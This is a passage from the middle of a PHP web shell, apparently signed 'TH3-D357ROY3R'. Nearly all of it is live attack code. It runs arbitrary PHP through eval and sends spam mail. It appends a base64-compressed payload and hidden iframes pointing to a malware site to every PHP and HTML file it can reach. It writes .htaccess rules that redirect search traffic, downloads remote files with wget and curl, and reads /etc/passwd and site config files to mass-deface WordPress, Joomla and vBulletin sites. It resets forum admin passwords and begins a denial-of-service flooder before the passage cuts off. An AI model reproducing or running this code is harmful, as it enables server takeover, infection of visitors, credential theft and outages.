3555 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
3556 {
3557 $error = 1;
3558 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
3559 break;
3560 }
3561 }
3562 if($error != 1)
3563 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
3564 }
3565 }
3566 else if($_POST['mailfunction'] == "massmailing")
3567 {
3568 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
3569 {
3570 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
3571 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
3572 else
3573 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
3574 }
3575 }
3576}
3577else if(isset($_POST['code']))
3578{
3579 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
3580 {
3581 // FIlter Some Chars we dont need
3582 ?><br>
3583 <textarea name="code" class="box" cols="120" rows="10"><?php
3584 $code = str_replace("<?php","",$_POST['code']);
3585 $code = str_replace("<?","",$code);
3586 $code = str_replace("?>","",$code);
3587
3588 // Evaluate PHP CoDE!
3589 htmlspecialchars(eval($code));
3590 ?>
3591 </textarea><?php
3592 }
3593 else if($_POST['code'] != null && $_POST['intext'] == "false")
3594 {
3595 $code = str_replace("<?php","",$_POST['code']);
3596 $code = str_replace("<?","",$code);
3597 $code = str_replace("?>","",$code);
3598
3599 // Evaluate PHP CoDE!
3600 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
3601 }
3602}
3603else if(isset($_GET['infect']))
3604{
3605 $mal_code="eNrtHO2OFDfsf6W+B5xWXL5nR0X9wyP0CU5AAcFBe6Dy+s3HfNheeybZnb3dAyTam8lkHcd2HNtx/PLr64cP/3z78/bm4726e9u/ewj3N7ffP3x+8+X7i7f/3X169te3hw+f3734++HL/av3dw+vvrx5+0zrsNPa7bTR8T8bn0151/E9fxv+pu/pm9I72+282vk+Nvpd3+/6LneJT1q5nVOlwcc3tXMDWKN2QYOfHY5rU4f0kzRkgqUjFNXnEbVWZQidwCdgEW6wO+tSz/h/l58TwPjH79NAQ1PCd/we8QJ9A3iBvQKEqPZCr4RaeYkYJaSUmZHCPSPydFifwabWONcMIn8zQ1MiUiSIC4WUZiJ9JkSkUegyrbXyGcVMaVV+Y2fICyxK6GodP+wHuIXQI7si3MgNty+YtIuIMztvF8c3Zh6swAu6kA5AjzQeZpoBFO72uU/sHaUhDuL6hKeLH3xGWOVnmz/tx+cosWZ8DmN7/KdBn/KT0u6G9gh8eobtBfjQ3+dB9wfwTR5Xjc+BgT8gCeCnTwWOGfub3B5m+DMcO84rjzXBSbhNcPzYrnLn8Rnhr2f488RH5CERpPaB+IGbbBiQpMRUgClq6A/hF+4w7YSJHJzU3oGJa9C/45iIiTYxBY2b4WyMT6GVG9s7hE8l8SkyHZLGud0L/Q0jgYhZWmjPk5olTQkry4+TUvnZHbQfEB8R4XAlquHflvgYMK4GK+sxV0THE4EwlGHiOVaKntsp8a1AfAPUlOXwUcJKP3EFsfRfwJOFvwnTsaTNexPUvXiyRFfDyfIr0QuTDSPxt9btxxDhImqhTk2trqytlj/6rRM4blY2JrRMyutpG8QxG8pFdts6nda2fNT48w0lVgPdvrXknKSIAsLkkDLUmAT92XEHslx867dn0DlWNM5nI9wD+qwa22ZYLFQhcxLCchyh8Wg+zrX5LCZzilXdjlcssxgT/DuB3VN/KN4SnR1SbnN/NUx5Ky19hBnfrEWtQPyO98WIAbOijU8kpgUWowFrFhg50JnljZ/LmfFNxgmaOCRIjyw3RpI1jU6sK3aoALloABWeXnCEzUxk0Rjz3FarZk1F+xuhP2T6Jg7yVdkzCqwIjVYQJM4sDAqoRw1wU9iCNYhZK8SX7CLstiBBBbsnUXdQCJndUN5teb4oXs1WWQVQeOBCM8BC0ID+re3L+JyTnqJSYj2dmsWulhb7bKgcTTeF8VmlD7Sr5R0Hyglap9iandxhaSeCvCBWboMVeoq8KcqvjaOCmweCtBgtTK+KUUpU4C1VSpefLNBUtZMl2slyRPBCexA0vxeI6beOVm0RLz17KFJiiprVwpbuvLomIvePFe9dILL6oYl8Zve/So0QHaiZDeUxJD9cF1MYIjs+BlUbB37SB7hbMWXzwOARaudgl/cOdWaiYT0ajuGFQWCJ7MH+hzKGpkPgsOSqiYEA7U37s5YnUUQTr4EBRi1Yg/EJiwExYtmC9kn+acwH0hkHEmdWOs6jhB4fXDtesHg3SUI4h2xfgxtS4xY5al0z/ReY2ORWE+HRxyrYareUD0i2zOvadc6C12/X9oVKXbRfi2JhseT3ta10mkHzRXTz4uEFExo9Mc7shBCuEXQpPpSR+L4C3w8GcK3xeQWHC6KwcUw/0RhL3cyvk6kznExdQYIZH89cyNDgDi+qfGEDiKnGAyxCfNiu8MrVnDBU92+Ab+kBUE3/Nvh9I/y+DT7fvti/Db5uhK8b4ZtG+KYRvm2Ebxvhu0b4rhG+b4TvG+GHRvihEX7XCL9p/brG9esa168T1q8BfLz0STdV5kE44ZViXxr07zaOQSEbvnJ7bSKCbjF7hONsumPK+fBtO6zl0wlE17UJH4V3CvlEb0Pb9Rhzxa84GuKkFmxXs5absZimyKwgaK6QbC7PO3Trx77XfAOl0acQg1QkvaHVoTuaXyTusYXDWJUqTxKiDJAH93OkoZ6woimeHXP0ANurIlFwgxZCPSQ17ohIlJR3NE/fyCcsRows8QHJIOSrnDMNVcrz2SziwdknyBi71F2JpgsjHoUdxGsFgMKT/VM17kKYwgrnIErYYjqUpbbBeUpFZt2C3ZX6mMVYLt4K0bh9RUySwxONe+mLOZsJ5xMXkirNgIVkWXtfA7NOjdEJK2LelTw2VFY9HekEcCFa7gWjS0psdkIuJTxU6tcCs3LAeZMcS5iqcfFs9rNrjHb3ueaoaP2kD3ooFRqpUjP8OpK7liM5kh/lK/qzAUyAD7X/zVPT8Iqx8SizbEsgThKSA6t+ZbuXsvpxZuM2OTYaeTeiG96KpwE0h0d+k81GsrhhWoLCYRN1gKdkE2qBXz+KEFZepUH3m9R6rAbZbIpPiGravhHTSZTbM64u6i9rJOSAKCFJEs7LA7OhYzI/YUESKlQ9c5H2MXdYGhD2HP6CZmZ2luUAfs2lftm2pzcXWDiKo6c+UFaBw7OrsBy4WxKUbtwOxVwCfaKOJDlX9Sv3+lHoRtL8BE7HC/nqrfYac5ER8nAQpSE+FJfZ+7NpfjG0ZYTYqeYzjZEwaCHqrpjg5C/mXiNzoSMppZEvbPeK1wy8OeHaHENqHgjp7nDbleKKMDMEbt9PTr0/suPAhoag1zkLm8L2DLQ9HGdrLebyodCQWrvYYiqul7Zuixf1UtlTqpOAQAmRgmzEVVT8dQZSeoIJs7NHbA5nozneX0a376sjdX0pgan3U21Lnd9KHdKxEmqu4WlK/c59LooZu4WxJqefan6WOpt9KnuZO8ICpeNIfSmiasqbH6pkjl9zjc29nSt6TtCHWp25rOZYz1TP9UxTEU49VGctpU1hAdOhImfBL1f3jC1FSQ7LtthvWS0Ek4f1ZW4uV31Ngj/WAg1lBlOPkTRDcdIyp/TH2Txar6eSoaAW6xruw542Fl/NtC+UjQikti5PIyOdoZUCrfFjKX5bJj79m1iJUTYjNzN8j3o+f/7H7c2/7z+Gr3fhnX59c/vydijg+/tv/wNVBhBL";
3606 $coun = 0;
3607 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
3608 {
3609 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3610 continue;
3611 if($myfile=fopen($injectj00,'a'))
3612 {
3613 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3614 fclose($myfile);
3615 $coun = 1;
3616 }
3617 }
3618 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
3619 {
3620 if($myfile=fopen($injectj00,'a'))
3621 {
3622 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3623 fclose($myfile);
3624 $coun = 1;
3625 }
3626 }
3627 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
3628 {
3629 if($myfile=fopen($injectj00,'a'))
3630 {
3631 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3632 fclose($myfile);
3633 $coun = 1;
3634 }
3635 }
3636 if($coun == 1)
3637 echo "<center>Done !!!!<center>";
3638 else
3639 echo "<center>Cannot open files !!!!<center>";
3640}
3641else if(isset($_GET['infectiframe']))
3642{
3643 $coun = 0;
3644 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
3645 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
3646 {
3647 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3648 continue;
3649 if($myfile=fopen($injectj00,'a'))
3650 {
3651 fputs($myfile, $str);
3652 fclose($myfile);
3653 $coun = 1;
3654 }
3655 }
3656 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
3657 {
3658 if($myfile=fopen($injectj00,'a'))
3659 {
3660 fputs($myfile, $str);
3661 fclose($myfile);
3662 $coun = 1;
3663 }
3664 }
3665 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
3666 {
3667 if($myfile=fopen($injectj00,'a'))
3668 {
3669 fputs($myfile, $str);
3670 fclose($myfile);
3671 $coun = 1;
3672 }
3673 }
3674
3675
3676 if($coun == 1)
3677 echo "<center>Done !!!!<center>";
3678 else
3679 echo "<center>Cannot open files !!!!<center>";
3680}
3681else if(isset($_GET['redirect']))
3682{
3683 if($myfile = fopen(".htaccess",'a'))
3684 {
3685 $mal = "# BEGIN WordPress
3686RewriteEngine On
3687RewriteOptions inherit
3688RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
3689RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
3690RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
3691RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
3692RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
3693RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
3694RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
3695RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
3696RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
3697RewriteRule .* ".$malsite." [R,L]\n\r";
3698 fwrite($myfile, $mal);
3699 fclose($myfile);
3700 echo "<center>Done !!!!<center>";
3701 }
3702 else
3703 echo "<center>Cannot open file !!!!<center>";
3704}
3705else if(isset($_GET['malware']))
3706{ ?>
3707 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3708 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
3709 <td><a href=# onClick="malwarefun('infectiframe')"><font class=txt size="4">| Infect Users with Iframe |</font></a></td>
3710 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
3711 <div id="showmal"></div>
3712 <?php
3713}
3714else if(isset($_GET['codeinsert']))
3715{
3716 if($file1 = fopen(".htaccess",'r'))
3717 {
3718 ?><div id="showcode"></div>
3719 <form method=post>
3720 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
3721 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
3722 </form>
3723 <?php }
3724 else
3725 echo "<center>Cannot Open File!!</center>";
3726}
3727else if(isset($_POST['getcode']))
3728{
3729 if($myfile = fopen(".htaccess",'a'))
3730 {
3731 fwrite($myfile, $_POST['getcode']);
3732 fwrite($myfile, "\n\r");
3733 fclose($myfile);
3734 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
3735 }
3736 else
3737 echo "Permission Denied";
3738}
3739else if(isset($_GET['uploadurl']))
3740{
3741 $functiontype = trim($_GET['functiontype']);
3742 $wurl = trim($_GET['wurl']);
3743 $path = magicboom($_GET['path']);
3744
3745 function remotedownload($cmd,$url)
3746 {
3747 $namafile = basename($url);
3748 switch($cmd)
3749 {
3750 case 'wwget':
3751 execmd(which('wget')." ".$url." -O ".$namafile);
3752 break;
3753 case 'wlynx':
3754 execmd(which('lynx')." -source ".$url." > ".$namafile);
3755 break;
3756 case 'wfread' :
3757 execmd($wurl,$namafile);
3758 break;
3759 case 'wfetch' :
3760 execmd(which('fetch')." -o ".$namafile." -p ".$url);
3761 break;
3762 case 'wlinks' :
3763 execmd(which('links')." -source ".$url." > ".$namafile);
3764 break;
3765 case 'wget' :
3766 execmd(which('GET')." ".$url." > ".$namafile);
3767 break;
3768 case 'wcurl' :
3769 execmd(which('curl')." ".$url." -o ".$namafile);
3770 break;
3771 default:
3772 break;
3773 }
3774 return $namafile;
3775 }
3776 $namafile = remotedownload($functiontype,$wurl);
3777 $fullpath = $path . $directorysperator . $namafile;
3778 if(is_file($fullpath))
3779 {
3780 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
3781 }
3782 else
3783 echo "<center>Failed to upload $namafile</center>";
3784}
3785else if(isset($_GET['createfolder']))
3786{
3787 if(!mkdir($_GET['createfolder']))
3788 echo '<BR>Failed To create<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
3789 else
3790 echo '<BR><font class=txt>Folder Created Successfully</font><BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
3791}
3792else if(isset($_GET['selfkill']))
3793{
3794 if(unlink($curfile))
3795 echo "<br><center><font size=5>Good Bye......</font></center>";
3796 else
3797 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
3798}
3799else if(isset($_GET['Create']))
3800{
3801 ?><BR>
3802 <form method="post">
3803 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
3804 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
3805 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
3806 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
3807 </form>
3808
3809<?php }
3810else if(isset($_GET['readfile']))
3811{
3812 if(is_file($_GET['readfile']))
3813 {
3814 $owner = "0/0";
3815 if($os == "Linux")
3816 $owner = getOGid($_GET['readfile']);
3817 ?>
3818 <form>
3819 <table style="width:57%;">
3820 <tr align="left">
3821 <td align="left">File : </td><td><font class=txt><?php echo $_GET['readfile'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['readfile']); ?>')"><?php echo filepermscolor($_GET['readfile']);?></a></td>
3822 </tr>
3823 <tr>
3824 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['readfile']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3825 </tr>
3826 </table>
3827 <textarea name="content" rows="15" cols="100" class="box"><?php
3828 $content = htmlspecialchars(file_get_contents($_GET['readfile']));
3829 if($content)
3830 {
3831 echo $content;
3832 }
3833 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
3834 {
3835 if(filesize($_GET['readfile']) != 0 )
3836 {
3837 fopen($_GET['readfile']);
3838 while(!feof())
3839 {
3840 echo htmlspecialchars(fgets($_GET['readfile']));
3841 }
3842 }
3843 }
3844
3845 ?>
3846 </textarea><br />
3847 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['readfile']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
3848 <input type="button" onClick="cancel()" value="cancel" class="but" />
3849 </form>
3850 <?php
3851 }
3852 else
3853 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
3854}
3855else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
3856{
3857 $content = $_POST['filecontent'];
3858 if($file_pointer = fopen($_POST['filecreator'], "w+"))
3859 {
3860 fwrite($file_pointer, $content);
3861 fclose($file_pointer);
3862 echo "<font class=txt>File Created Successfully</font>";
3863 }
3864 else
3865 echo "Cannot Create File";
3866}
3867else if(isset($_REQUEST["massdeface"]))
3868{
3869?><center><table><tr><td><a href=# onClick="getmydefacedata('masswp')"><font class=txt size="4">| Wordpress |</font></a></td>
3870 <td><a href=# onClick="getmydefacedata('massjo')"><font class=txt size="4">| Joomla |</font></a></td>
3871 <td><a href=# onClick="getmydefacedata('massvb')"><font class=txt size="4">| Vbulletin |</font></a></td>
3872 </tr></table></center><br><div id="showmydeface"></div><?php
3873}
3874else if(isset($_REQUEST["masswp"]))
3875{
3876 ?><center><form method="post">
3877 <textarea id="massdef" cols=80 rows="19" class="box">TH3-D357ROY3R WAS HERE </textarea>
3878 <br><input type="button" onClick="massdeface('domasswp',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3879}
3880else if(isset($_REQUEST["massjo"]))
3881{
3882 ?><center><form method="post"><textarea id="massdef" cols=80 rows="20" class="box">TH3-D357ROY3R WAS HERE !!!!!</textarea>
3883 <br><input type="button" onClick="massdeface('domassjo',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3884}
3885else if(isset($_REQUEST["massvb"]))
3886{
3887 ?><center><form method="post"><textarea id="massdef" cols=80 rows="20" class="box">TH3-D357ROY3R WAS HERE !!!!!</textarea>
3888 <br><input type="button" onClick="massdeface('domassvb',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3889}
3890else if(isset($_REQUEST["massscript"]))
3891{
3892 if($os != "Windows")
3893 {
3894 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
3895 $path=explode('/',$url);
3896 $url =str_replace($path[count($path)-1],'',$url);
3897
3898 if($_REQUEST["massscript"] == "domasswp")
3899 {
3900 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
3901 mkdir("dhanush");
3902 chdir("dhanush");
3903 execmd("ln -s / root");
3904 $file3 = 'Options all
3905 DirectoryIndex Sux.html
3906 AddType text/plain .php
3907 AddHandler server-parsed .php
3908 AddType text/plain .html
3909 AddHandler txt .html
3910 Require None
3911 Satisfy Any
3912 ';
3913 $fp3 = fopen('.htaccess','w');
3914 $fw3 = fwrite($fp3,$file3);
3915 @fclose($fp3);
3916 if(@file('/etc/passwd'))
3917 {
3918 $users = file('/etc/passwd');
3919 foreach($users as $user)
3920 {
3921 $user = explode(':', $user);
3922
3923 $conf = @file_get_contents($url."dhanush/root/home/".$user[0]."/public_html/wp-config.php");
3924 if(entre2v2($conf,"define('DB_USER', '","');"))
3925 changeindexwp($conf,$_REQUEST['massdef']);
3926 }
3927 }
3928 else
3929 {
3930 $temp = "";
3931 $val1 = 0;
3932 $val2 = 1000;
3933 for(;$val1 <= $val2;$val1++)
3934 {
3935 $uid = @posix_getpwuid($val1);
3936 if ($uid)
3937 $temp .= join(':',$uid)."\n";
3938 }
3939
3940 $temp = trim($temp);
3941
3942 if($file5 = fopen("test.txt","w"))
3943 {
3944 fputs($file5,$temp);
3945 fclose($file5);
3946
3947 $file = fopen("test.txt", "r");
3948 while(!feof($file))
3949 {
3950 $s = fgets($file);
3951 $matches = array();
3952 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3953 $matches = str_replace("home/","",$matches[1]);
3954 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3955 continue;
3956 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/wp-config.php");
3957 if(entre2v2($conf,"define('DB_USER', '","');"))
3958 changeindexwp($conf,$_REQUEST['massdef']);
3959 }
3960 fclose($file);
3961 }
3962 }
3963 }
3964 elseif($_REQUEST["massscript"] == "domassjo")
3965 {
3966 mkdir("dhanush");
3967 chdir("dhanush");
3968 $d0mains = @file("/etc/named.conf");
3969 if($d0mains)
3970 {
3971 $defcount = 0;
3972 echo "<center><table border=1 style='width:80%;'><tr align=center><th>Login new info</th><th>Login info</th><th>Site</th><th>Message</th><tr>";
3973 foreach($d0mains as $d0main)
3974 {
3975 if(eregi("zone",$d0main))
3976 {
3977 preg_match_all('#zone "(.*)"#', $d0main, $domains);
3978 flush();
3979
3980 if(strlen(trim($domains[1][0])) > 2)
3981 {
3982 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
3983 $conf = @file_get_contents($url."dhanush/root/home/".$user['name']."/public_html/configuration.php");
3984 if(entre2v2($conf,$dol."user = '","';"))
3985 changeindexjo($conf,$_REQUEST['massdef'],$domains[1][0]);
3986 }
3987 }
3988 }
3989 echo '</table><br><h3>'.$defcount.' sites defaced</h3>';
3990 }
3991 else
3992 echo "Cannot Read /etc/named.conf";
3993 }
3994 elseif($_REQUEST["massscript"] == "domassvb")
3995 {
3996 mkdir("dhanush");
3997 chdir("dhanush");
3998 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
3999
4000 if(@file('/etc/passwd'))
4001 {
4002 $users = file('/etc/passwd');
4003 foreach($users as $user)
4004 {
4005 $user = explode(':', $user);
4006 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/includes/config.php");
4007 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4008 changeindexvb($conf,$_REQUEST['massdef']);
4009 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/configuration.php");
4010 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4011 changeindexvb($conf,$_REQUEST['massdef']);
4012 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/forum/configuration.php");
4013 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4014 changeindexvb($conf,$_REQUEST['massdef']);
4015 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/core/configuration.php");
4016 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4017 changeindexvb($conf,$_REQUEST['massdef']);
4018 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/core/configuration.php");
4019 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4020 changeindexvb($conf,$_REQUEST['massdef']);
4021 }
4022 }
4023 else
4024 {
4025 $temp = "";
4026 $val1 = 0;
4027 $val2 = 1000;
4028 for(;$val1 <= $val2;$val1++)
4029 {
4030 $uid = @posix_getpwuid($val1);
4031 if ($uid)
4032 $temp .= join(':',$uid)."\n";
4033 }
4034
4035 $temp = trim($temp);
4036
4037 if($file5 = fopen("test.txt","w"))
4038 {
4039 fputs($file5,$temp);
4040 fclose($file5);
4041
4042 $file = fopen("test.txt", "r");
4043 while(!feof($file))
4044 {
4045 $s = fgets($file);
4046 $matches = array();
4047 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
4048 $matches = str_replace("home/","",$matches[1]);
4049 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
4050 continue;
4051 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/includes/config.php");
4052 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4053 changeindexvb($conf,$_REQUEST['massdef']);
4054 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/configuration.php");
4055 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4056 changeindexvb($conf,$_REQUEST['massdef']);
4057 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/forum/configuration.php");
4058 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4059 changeindexvb($conf,$_REQUEST['massdef']);
4060 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/core/configuration.php");
4061 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4062 changeindexvb($conf,$_REQUEST['massdef']);
4063 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/core/configuration.php");
4064 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4065 changeindexvb($conf,$_REQUEST['massdef']);
4066 changeindexvb($conf,$_REQUEST['massdef']);
4067 }
4068 fclose($file);
4069 }
4070 }
4071 }
4072 echo "</table><center>";
4073 }
4074 else
4075 echo "<center>Cannot do mass deface</center>";
4076}
4077else if(isset($_REQUEST["defaceforum"]))
4078{
4079 ?>
4080 <center><div id="showdeface"></div>
4081 <font size="4">Forum Index Changer</font>
4082 <form action="<?php echo $self; ?>" method = "POST">
4083 <input type="hidden" name="forum">
4084 <input type="hidden" name="defaceforum">
4085 <table class=btmtbl border = "1" width="60%" style="text-align: center;" align="center">
4086 <tr>
4087 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
4088
4089 <td width="50%"> Database : <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
4090 <tr><td height="50" width="50%">User : <input type ="text" class="sbox" name = "f3" size="20"> </td>
4091 <td> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
4092
4093 <tr><td height="50" width="50%">Type :
4094 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
4095 <option value="vb">vbulletin</option>
4096 <option value="mybb">Mybb</option>
4097 <option value="smf">SMF</option>
4098 <option value="ipb">IPB</option>
4099 <option value="wp">Wordpress</option>
4100 <option value="joomla">Joomla</option>
4101 </select></td>
4102 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
4103
4104 </tr>
4105 <tr>
4106 <td height="167" width="50%" colspan=2>
4107 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" id="siteurl" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
4108
4109 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
4110
4111 </div>
4112
4113 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! TH3-D357ROY3R WAS HERE !!!!</b></textarea><p align="center">
4114 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,f5.value)" class="but" value = "Hack It">
4115 </td>
4116 </tr>
4117 </table>
4118 </form>
4119 </center>
4120 <?php
4121 }
4122 else if(isset($_GET["passwordchange"]))
4123 {
4124 echo "<center>";
4125 ?>
4126 <div id="showchangepass"></div>
4127 <font size="4">Forum Password Changer</font>
4128 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value);return false;">
4129 <table class=btmtbl border = "1" width="60%" height="246" style="text-align: center;" align="center">
4130 <tr>
4131 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> DataBase : <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> User : <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
4132 <tr>
4133 <td height="50" width="50%">Type :
4134 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
4135 <option value="vb">vbulletin</option>
4136 <option value="mybb">Mybb</option>
4137 <option value="smf">SMF</option>
4138 <option value="ipb">IPB</option>
4139 <option value="phpbb">PHPBB</option>
4140 <option value="wp">Wordpress</option>
4141 <option value="joomla">Joomla</option>
4142 </select></td>
4143 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
4144 </tr>
4145 <tr>
4146 <td colspan=2 height="100" width="780">
4147
4148 <p align="center"><div id="fid" style="display:block;">User ID : <input class="sbox" type="text" name="ipbuid" size="20" value="1"> New Password : <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
4149
4150 <div id="joomla" style="display:none;">New Username : <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
4151
4152 <div id="wpress" style="display:none;"><p>New Username : <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p></div>
4153
4154 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
4155 </tr>
4156 </table>
4157 </form>
4158 </center>
4159 <?php
4160}
4161else if(isset($_GET['dosser']))
4162{
4163 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
4164 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
4165 {
4166 $IP=$_GET['ip'];
4167 $port=$_GET['port'];
4168 $executionTime = $_GET['exTime'];
4169 $no0fBytes = $_GET['no0fBytes'];
4170 $data = "";
4171 $timeout = $_GET['timeout'];
4172 $packets = 0;
4173 $counter = $no0fBytes;
